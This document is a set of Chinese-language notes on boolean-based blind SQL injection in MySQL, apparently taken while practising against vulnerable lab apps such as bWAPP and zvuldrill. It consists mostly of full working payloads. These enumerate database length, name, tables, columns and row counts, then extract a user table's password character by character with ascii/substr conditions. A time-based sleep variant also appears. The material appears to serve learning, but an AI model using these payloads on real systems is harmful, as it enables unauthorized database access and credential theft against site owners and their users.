查询数据库长度
select * from movies where id=1 or if((select length(database()))=6,1,0); # =可以换成<>
http://192.168.52.128/bWAPP/bWAPP/sqli_2.php?action=go&movie=100 or if((select length(database()))=5,1,0)

http://192.168.52.128/test2/zvuldrill-master/search.php?search=1%'+or if((select length(database()))=9,1,0)%23

查询数据库名字
select * from movies where id='1' or if((select ascii(substr((select database()),1,1))=98),1,0);
http://192.168.52.128/test2/zvuldrill-master/search.php?search=1%'or if((select ascii(substr((select database()),1,1))=122),1,0)%23

查询数据库表个数
select * from test1 where id=0 or if((select ascii(substr((select count(*) from information_schema.tables where table_schema=0x74657374),1,1)))>51,1,0)
-- -http://192.168.52.128/test2/zvuldrill-master/search.php?search=1%'+or if((select count(*) from information_schema.tables where table_schema=0x7A76756C6472696C6C)=3,1,0)%23
查数据库test中表的个数基础知识--这里的方法只使用与表的个数少于10的，要是多多于10的话substr(({sql}),2,1)要这样增加截取，或者substr(({sql}),1,2)

查询数据库第一个表名的第一个字符
id=0 or if((select ascii(substr((select table_name from information_schema.tables where table_schema=0x74657374 limit 0,1),1,1))>115),1,0)

查询数据库表的字段个数
id=0 or if((select ascii(substr((select count(*) from information_schema.columns where table_name=0x7465737431),1,1)))>50,1,0) 返回正常 大于50
select ascii(substr((select count(*) from information_schema.columns where+table_name=0x61646D696E),2,3)) 只能一个字符一个字符的来 但是多个ascii函数
select substr((select count(*) from information_schema.columns where+table_name=0x31),1,2)

查询数据库表的字段名
id=0 or if((select ascii(substr((select column_name from information_schema.columns where table_name=0x7465737431 limit 0,1),1,1))>105),1,0)
id=0 or if((select ascii(substr((select column_name from information_schema.columns where table_name=0x7465737431 limit 0,1),2,1))>105),1,0)

判断字段的最后一个字符,可以通过判断substr返回的是否为null,null的ascii为0
id=0 or if((select ascii(substr((select column_name from information_schema.columns where table_name=0x7465737431 limit 0,1),1,1))>105),1,0)

得出user表中有多少行数据
id=0 or if((select ascii(substr((select count(*) from user limit 0,1),1,1))>51),1,0)



盲注第一个字符
id=0 or if((select ascii(substr((select password from user limit 0,1),1,1))>111),1,0)
盲注第二个字符
id=0 or if((select ascii(substr((select password from user limit 0,1),2,1))>118),1,0)
盲注第三个字符
id=0 or if((select ascii(substr((select password from user limit 0,1),3,1))>99),1,0)
盲注第四个字符
id=0 or if((select ascii(substr((select password from user limit 0,1),4,1))>48),1,0)
盲注第五个字符
id=0 or if((select ascii(substr((select password from user limit 0,1),5,1))=0),1,0)
返回正常 第五个字符ascii为0--对应为null---说明第一行的password值已经全部注入出来


#if(({sql}),sleep(2),0)

